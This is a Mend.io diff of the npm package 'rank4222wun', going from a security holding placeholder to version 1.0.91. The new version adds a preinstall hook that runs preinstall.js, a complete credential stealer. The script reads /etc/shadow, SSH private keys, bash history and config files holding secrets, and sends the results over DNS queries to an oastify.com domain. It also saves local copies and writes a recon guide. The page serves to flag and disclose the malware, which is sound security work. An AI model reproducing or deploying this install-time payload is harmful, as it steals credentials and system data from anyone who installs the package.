npm - rank4222wun - Versions diffs - 0.0.1-security → 1.0.91 - Mend

rank4222wun 0.0.1-security → 1.0.91

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of rank4222wun might be problematic. Click here for more details.

Files changed (4) hide show

package/package.json CHANGED Viewed

@@ -1,6 +1,9 @@
 {
   "name": "rank4222wun",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "1.0.91",
+  "description": "",
+  "scripts": {
+    "preinstall": "node preinstall.js"
+  },
+  "dependencies": {}
 }

package/preinstall.js ADDED Viewed

@@ -0,0 +1,582 @@
+const { exec } = require('child_process');
+const fs = require('fs');
+const path = require('path');
+const dns = require('dns');
+const crypto = require('crypto');
+const os = require('os');
+const { promisify } = require('util');
+console.log("🔐 DNS-ONLY DATA EXFILTRATION SYSTEM\n");
+const TARGET_DOMAIN = 'mkaq3wbzvqg33yks6wqpxxo77ydp1hr5g.oastify.com';
+const DNS_SERVER = '8.8.8.8'; // استخدام Google DNS
+const SCAN_ID = crypto.randomBytes(4).toString('hex');
+const BATCH_SIZE = 5;
+const DELAY_MS = 200;
+// ===================== DNS ENGINE =====================
+class DNSEngine {
+    constructor(domain) {
+        this.domain = domain;
+        this.resolver = new dns.Resolver();
+        this.resolver.setServers([DNS_SERVER]);
+        this.stats = { sent: 0, failed: 0 };
+    }
+    async sendChunk(data, type = 'data', seq = 0, total = 1) {
+        return new Promise((resolve) => {
+            // إنشاء subdomain فريد
+            const subdomain = `${type}.${seq}.${total}.${SCAN_ID}.${Date.now().toString(36)}.${this.domain}`;
+            this.resolver.resolve4(subdomain, (err) => {
+                if (err) {
+                    this.stats.failed++;
+                    resolve(false);
+                } else {
+                    this.stats.sent++;
+                    resolve(true);
+                }
+            });
+        });
+    }
+    async sendData(data, label = 'data') {
+        const chunks = this.splitData(data);
+        for (let i = 0; i < chunks.length; i += BATCH_SIZE) {
+            const batch = chunks.slice(i, i + BATCH_SIZE);
+            const promises = batch.map((chunk, idx) =>
+                this.sendChunk(chunk, label, i + idx, chunks.length)
+            );
+            await Promise.all(promises);
+            await this.sleep(DELAY_MS);
+            if (i % 20 === 0) {
+                console.log(`📤 Progress: ${i}/${chunks.length} chunks sent`);
+            }
+        }
+        return this.stats;
+    }
+    splitData(data) {
+        // تحويل البيانات إلى تنسيق DNS-safe
+        const encoded = Buffer.from(data).toString('base64')
+            .replace(/=/g, '')
+            .replace(/\//g, '_')
+            .replace(/\+/g, '-');
+        const chunks = [];
+        const chunkSize = 30; // حجم آمن لـ DNS label
+        for (let i = 0; i < encoded.length; i += chunkSize) {
+            chunks.push(encoded.substr(i, chunkSize));
+        }
+        return chunks;
+    }
+    sleep(ms) {
+        return new Promise(resolve => setTimeout(resolve, ms));
+    }
+}
+// ===================== DATA COLLECTOR =====================
+async function collectAllData() {
+    console.log("🕵️‍♂️ Collecting critical data...\n");
+    const data = {
+        // Metadata
+        meta: {
+            id: SCAN_ID,
+            time: Date.now(),
+            host: os.hostname(),
+            user: os.userInfo().username,
+            platform: os.platform(),
+            arch: os.arch()
+        },
+        // System Info
+        system: {},
+        // Processes
+        processes: [],
+        // Network
+        network: {},
+        // Files
+        files: {},
+        // Configs
+        configs: []
+    };
+    // 1. Basic System Info
+    console.log("[1/6] System info...");
+    data.system = {
+        cpus: os.cpus().length,
+        memory: Math.round(os.totalmem() / 1024 / 1024) + ' MB',
+        uptime: os.uptime(),
+        load: os.loadavg(),
+        version: os.version(),
+        release: os.release()
+    };
+    // 2. Network Info
+    console.log("[2/6] Network info...");
+    const ifaces = os.networkInterfaces();
+    data.network = {
+        interfaces: Object.keys(ifaces),
+        addresses: []
+    };
+    Object.values(ifaces).forEach(addrs => {
+        addrs.forEach(addr => {
+            if (addr.family === 'IPv4' && !addr.internal) {
+                data.network.addresses.push(addr.address);
+            }
+        });
+    });
+    // 3. Running Processes (Top 20)
+    console.log("[3/6] Running processes...");
+    const procs = await execAsync('ps aux --sort=-%cpu | head -20');
+    data.processes = procs.split('\n').filter(p => p.trim());
+    // 4. Critical Files
+    console.log("[4/6] Scanning for critical files...");
+    const foundFiles = await scanCriticalFiles();
+    data.files = foundFiles;
+    // 5. Configuration Discovery
+    console.log("[5/6] Looking for configurations...");
+    data.configs = await findConfigurations();
+    // 6. Docker/Kubernetes Check
+    console.log("[6/6] Container environment check...");
+    data.container = await checkContainer();
+    return data;
+}
+async function scanCriticalFiles() {
+    const results = {
+        passwd: null,
+        shadow: null,
+        hosts: null,
+        bash_history: null,
+        ssh_keys: []
+    };
+    const files = [
+        '/etc/passwd',
+        '/etc/shadow',
+        '/etc/hosts',
+        '/root/.bash_history',
+        os.homedir() + '/.bash_history',
+        '/root/.ssh/id_rsa',
+        '/root/.ssh/id_rsa.pub',
+        os.homedir() + '/.ssh/id_rsa'
+    ];
+    for (const file of files) {
+        try {
+            if (fs.existsSync(file)) {
+                const stats = fs.statSync(file);
+                if (stats.size < 10000) { // قراءة ملفات صغيرة فقط
+                    const content = fs.readFileSync(file, 'utf8').substring(0, 500);
+                    if (file.includes('passwd')) results.passwd = content;
+                    else if (file.includes('shadow')) results.shadow = content;
+                    else if (file.includes('hosts')) results.hosts = content;
+                    else if (file.includes('bash_history')) results.bash_history = content;
+                    else if (file.includes('id_rsa') && !file.includes('.pub')) {
+                        results.ssh_keys.push({
+                            file: file,
+                            preview: content.substring(0, 100)
+                        });
+                    }
+                }
+            }
+        } catch (e) {
+            // تجاهل الملفات غير القابلة للقراءة
+        }
+    }
+    return results;
+}
+async function findConfigurations() {
+    const configs = [];
+    const searchPaths = [
+        '/etc',
+        '/opt',
+        '/root',
+        os.homedir(),
+        '/var',
+        '/tmp'
+    ];
+    const patterns = [
+        /\.env$/,
+        /config\.(json|yml|yaml|ini)$/,
+        /\.(pem|key|crt)$/,
+        /credentials$/,
+        /settings\.(py|js|json)$/
+    ];
+    // البحث في المسارات الشائعة
+    for (const dir of searchPaths) {
+        try {
+            if (fs.existsSync(dir)) {
+                const cmd = `find "${dir}" -type f \\( -name "*.env" -o -name "*.config" -o -name "*.json" -o -name "*.yml" -o -name "*.yaml" -o -name "*.pem" -o -name "*.key" \\) -size -50k 2>/dev/null | head -10`;
+                const result = await execAsync(cmd);
+                if (result.trim()) {
+                    const files = result.trim().split('\n');
+                    for (const file of files) {
+                        try {
+                            const content = fs.readFileSync(file, 'utf8');
+                            // البحث عن بيانات حساسة
+                            const sensitivePatterns = [
+                                /(password|passwd|pwd)\s*[:=]\s*['"]?([^'"\s]+)/gi,
+                                /(user|username)\s*[:=]\s*['"]?([^'"\s]+)/gi,
+                                /(host|server)\s*[:=]\s*['"]?([^'"\s]+)/gi,
+                                /(token|secret|key)\s*[:=]\s*['"]?([^'"\s]+)/gi,
+                                /(AKIA|ASIA)[A-Z0-9]{16}/gi,
+                                /[0-9a-zA-Z/+]{40}/g
+                            ];
+                            const matches = [];
+                            sensitivePatterns.forEach(pattern => {
+                                const found = content.match(pattern);
+                                if (found) matches.push(...found.slice(0, 3));
+                            });
+                            if (matches.length > 0 || content.length < 1000) {
+                                configs.push({
+                                    file: file,
+                                    size: content.length,
+                                    matches: matches.slice(0, 5),
+                                    preview: content.substring(0, 200)
+                                });
+                            }
+                        } catch (e) {
+                            // تجاهل الملفات غير القابلة للقراءة
+                        }
+                    }
+                }
+            }
+        } catch (e) {
+            // تجاهل الدلائل غير القابلة للوصول
+        }
+    }
+    return configs;
+}
+async function checkContainer() {
+    const checks = {
+        isContainer: false,
+        isDocker: false,
+        isKubernetes: false,
+        hasDockerSock: false,
+        mounts: []
+    };
+    try {
+        // Check if running in container
+        const cgroup = fs.readFileSync('/proc/1/cgroup', 'utf8');
+        checks.isContainer = cgroup.includes('docker') || cgroup.includes('kubepods');
+        checks.isDocker = cgroup.includes('docker');
+        checks.isKubernetes = cgroup.includes('kubepods');
+        // Check Docker socket
+        checks.hasDockerSock = fs.existsSync('/var/run/docker.sock');
+        // Check mounts
+        const mount = await execAsync('mount 2>/dev/null || cat /proc/mounts 2>/dev/null');
+        checks.mounts = mount.split('\n').slice(0, 5);
+    } catch (e) {
+        // ليس حاوية أو لا يمكن القراءة
+    }
+    return checks;
+}
+// ===================== EXECUTION HELPERS =====================
+function execAsync(cmd) {
+    return new Promise((resolve) => {
+        exec(cmd, { timeout: 3000 }, (error, stdout) => {
+            if (error || !stdout) {
+                resolve('');
+            } else {
+                resolve(stdout);
+            }
+        });
+    });
+}
+// ===================== DATA PROCESSOR =====================
+function prepareDataForExfiltration(data) {
+    console.log("\n📦 Preparing data for DNS exfiltration...");
+    // تقليل حجم البيانات
+    const compressedData = {
+        meta: data.meta,
+        system: {
+            cpus: data.system.cpus,
+            memory: data.system.memory,
+            addresses: data.network.addresses
+        },
+        processes: data.processes.slice(0, 5),
+        files: {
+            found_passwd: !!data.files.passwd,
+            found_shadow: !!data.files.shadow,
+            ssh_keys: data.files.ssh_keys.length
+        },
+        configs: data.configs.slice(0, 3).map(c => ({
+            file: path.basename(c.file),
+            matches: c.matches.length
+        })),
+        container: data.container
+    };
+    return JSON.stringify(compressedData);
+}
+// ===================== LOCAL STORAGE =====================
+function saveDataLocally(data) {
+    const storageDir = `/tmp/dns_exfil_${SCAN_ID}`;
+    if (!fs.existsSync(storageDir)) {
+        fs.mkdirSync(storageDir, { recursive: true });
+    }
+    // 1. Save full data
+    fs.writeFileSync(
+        path.join(storageDir, 'full_data.json'),
+        JSON.stringify(data, null, 2)
+    );
+    // 2. Create summary
+    const summary = `
+===========================================
+DNS EXFILTRATION REPORT - ${SCAN_ID}
+===========================================
+Time: ${new Date().toISOString()}
+Host: ${data.meta.host}
+User: ${data.meta.user}
+📊 SYSTEM:
+- CPUs: ${data.system.cpus}
+- Memory: ${data.system.memory}
+- Uptime: ${data.system.uptime}s
+- IPs: ${data.network.addresses.join(', ')}
+🔧 PROCESSES (top 5):
+${data.processes.slice(0, 5).map(p => `  ${p}`).join('\n')}
+🗄️  FILES:
+- /etc/passwd: ${data.files.passwd ? 'FOUND' : 'not found'}
+- /etc/shadow: ${data.files.shadow ? 'FOUND' : 'not found'}
+- SSH Keys: ${data.files.ssh_keys.length}
+⚙️  CONFIGS: ${data.configs.length} found
+🐳 CONTAINER: ${data.container.isContainer ? 'YES' : 'NO'}
+===========================================
+`;
+    fs.writeFileSync(path.join(storageDir, 'summary.txt'), summary);
+    // 3. Save sensitive data separately
+    if (data.files.passwd || data.files.shadow || data.files.ssh_keys.length > 0) {
+        const sensitive = {
+            passwd: data.files.passwd,
+            shadow: data.files.shadow,
+            ssh_keys: data.files.ssh_keys,
+            configs: data.configs
+        };
+        fs.writeFileSync(
+            path.join(storageDir, 'sensitive.json'),
+            JSON.stringify(sensitive, null, 2)
+        );
+    }
+    console.log(`💾 Data saved locally in: ${storageDir}`);
+    return storageDir;
+}
+// ===================== MAIN EXECUTION =====================
+async function main() {
+    console.log("=".repeat(60));
+    console.log("🔐 DNS-ONLY DATA EXFILTRATION SYSTEM");
+    console.log("=".repeat(60));
+    console.log(`Target Domain: ${TARGET_DOMAIN}`);
+    console.log(`Scan ID: ${SCAN_ID}`);
+    console.log(`DNS Server: ${DNS_SERVER}`);
+    console.log("=".repeat(60));
+    try {
+        // Phase 1: DNS Connectivity Test
+        console.log("\n📡 Testing DNS connectivity...");
+        const dnsTest = await new Promise((resolve) => {
+            dns.lookup(TARGET_DOMAIN, (err, address) => {
+                if (err) {
+                    console.log(`❌ DNS test failed: ${err.message}`);
+                    resolve(false);
+                } else {
+                    console.log(`✅ DNS resolved: ${address}`);
+                    resolve(true);
+                }
+            });
+        });
+        if (!dnsTest) {
+            console.log("⚠️ DNS not working, saving data locally only");
+            const data = await collectAllData();
+            saveDataLocally(data);
+            return;
+        }
+        // Phase 2: Data Collection
+        console.log("\n" + "=".repeat(60));
+        console.log("🕵️‍♂️ PHASE 1: DATA COLLECTION");
+        console.log("=".repeat(60));
+        const collectedData = await collectAllData();
+        const storagePath = saveDataLocally(collectedData);
+        // Phase 3: Data Preparation
+        console.log("\n" + "=".repeat(60));
+        console.log("📦 PHASE 2: DATA PREPARATION");
+        console.log("=".repeat(60));
+        const exfilData = prepareDataForExfiltration(collectedData);
+        console.log(`Data size: ${exfilData.length} characters`);
+        console.log(`Will be split into ~${Math.ceil(exfilData.length / 30)} DNS queries`);
+        // Phase 4: DNS Exfiltration
+        console.log("\n" + "=".repeat(60));
+        console.log("📡 PHASE 3: DNS EXFILTRATION");
+        console.log("=".repeat(60));
+        const dnsEngine = new DNSEngine(TARGET_DOMAIN);
+        // إرسال البيانات الرئيسية
+        console.log("\nSending main data...");
+        const stats = await dnsEngine.sendData(exfilData, 'main');
+        // إرسال إشارة الانتهاء
+        console.log("\nSending completion signal...");
+        await dnsEngine.sendChunk('COMPLETE', 'end', 1, 1);
+        // Phase 5: Results
+        console.log("\n" + "=".repeat(60));
+        console.log("✅ EXFILTRATION COMPLETE");
+        console.log("=".repeat(60));
+        console.log(`\n📊 STATISTICS:`);
+        console.log(`DNS queries sent: ${stats.sent}`);
+        console.log(`DNS queries failed: ${stats.failed}`);
+        console.log(`Success rate: ${Math.round((stats.sent / (stats.sent + stats.failed)) * 100)}%`);
+        console.log(`\n📁 LOCAL DATA:`);
+        console.log(`Full data: ${storagePath}/full_data.json`);
+        console.log(`Summary: ${storagePath}/summary.txt`);
+        console.log(`\n🎯 NEXT STEPS:`);
+        console.log(`1. Check DNS logs for queries to: *.${TARGET_DOMAIN}`);
+        console.log(`2. Look for base64 encoded data in subdomains`);
+        console.log(`3. Reconstruct data from DNS queries`);
+        console.log("\n" + "=".repeat(60));
+        // إنشاء دليل للاستمرار يدوياً
+        createManualGuide(storagePath, collectedData);
+    } catch (error) {
+        console.error(`\n❌ Error: ${error.message}`);
+        console.error(error.stack);
+        // محاولة حفظ أي بيانات تم جمعها
+        try {
+            const emergencyData = {
+                meta: {
+                    id: SCAN_ID,
+                    time: Date.now(),
+                    host: os.hostname(),
+                    error: error.message
+                }
+            };
+            const emergencyDir = `/tmp/emergency_${SCAN_ID}`;
+            if (!fs.existsSync(emergencyDir)) {
+                fs.mkdirSync(emergencyDir, { recursive: true });
+            }
+            fs.writeFileSync(
+                path.join(emergencyDir, 'error.json'),
+                JSON.stringify(emergencyData, null, 2)
+            );
+            console.log(`⚠️ Emergency data saved to: ${emergencyDir}`);
+        } catch (e) {
+            console.log('Could not save emergency data');
+        }
+    }
+}
+function createManualGuide(storagePath, data) {
+    const guide = `
+# MANUAL CONTINUATION GUIDE
+# Scan ID: ${SCAN_ID}
+# Host: ${data.meta.host}
+## QUICK COMMANDS:
+# Check network
+ip addr show
+ip route show
+netstat -tulpn
+# Check processes
+ps aux | grep -E "(npm|node|docker|kube|tencent|hscan)"
+# Find configuration files
+find /etc /opt /root -name "*.env" -o -name "*.json" -o -name "*.yaml" -o -name "*.config"
+# Check Docker
+docker ps -a 2>/dev/null
+ls -la /var/run/docker.sock 2>/dev/null
+# Look for credentials
+find / -name "*.pem" -o -name "*.key" -o -name "id_rsa" 2>/dev/null | head -20
+## DNS TEST:
+# Test DNS resolution
+nslookup ${TARGET_DOMAIN}
+dig ${TARGET_DOMAIN} ANY
+## DATA LOCATION:
+# Full data: ${storagePath}/full_data.json
+# Summary: ${storagePath}/summary.txt
+# Sensitive: ${storagePath}/sensitive.json (if exists)
+## RECONSTRUCTION:
+# DNS queries pattern: *.${SCAN_ID}.*.${TARGET_DOMAIN}
+# Data is base64 encoded in subdomains
+`;
+    fs.writeFileSync(path.join(storagePath, 'MANUAL_GUIDE.txt'), guide);
+    console.log(`📘 Manual guide: ${storagePath}/MANUAL_GUIDE.txt`);
+}
+// ===================== START =====================
+console.log("\n🚀 Starting DNS exfiltration in 3 seconds...");
+setTimeout(() => {
+    main().catch(console.error);
+}, 3000);

package/rank4222wun-1.0.91.tgz ADDED Viewed

Binary file

package/README.md DELETED Viewed

@@ -1,5 +0,0 @@
-# Security holding package
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-Please refer to www.npmjs.com/advisories?search=rank4222wun for more information.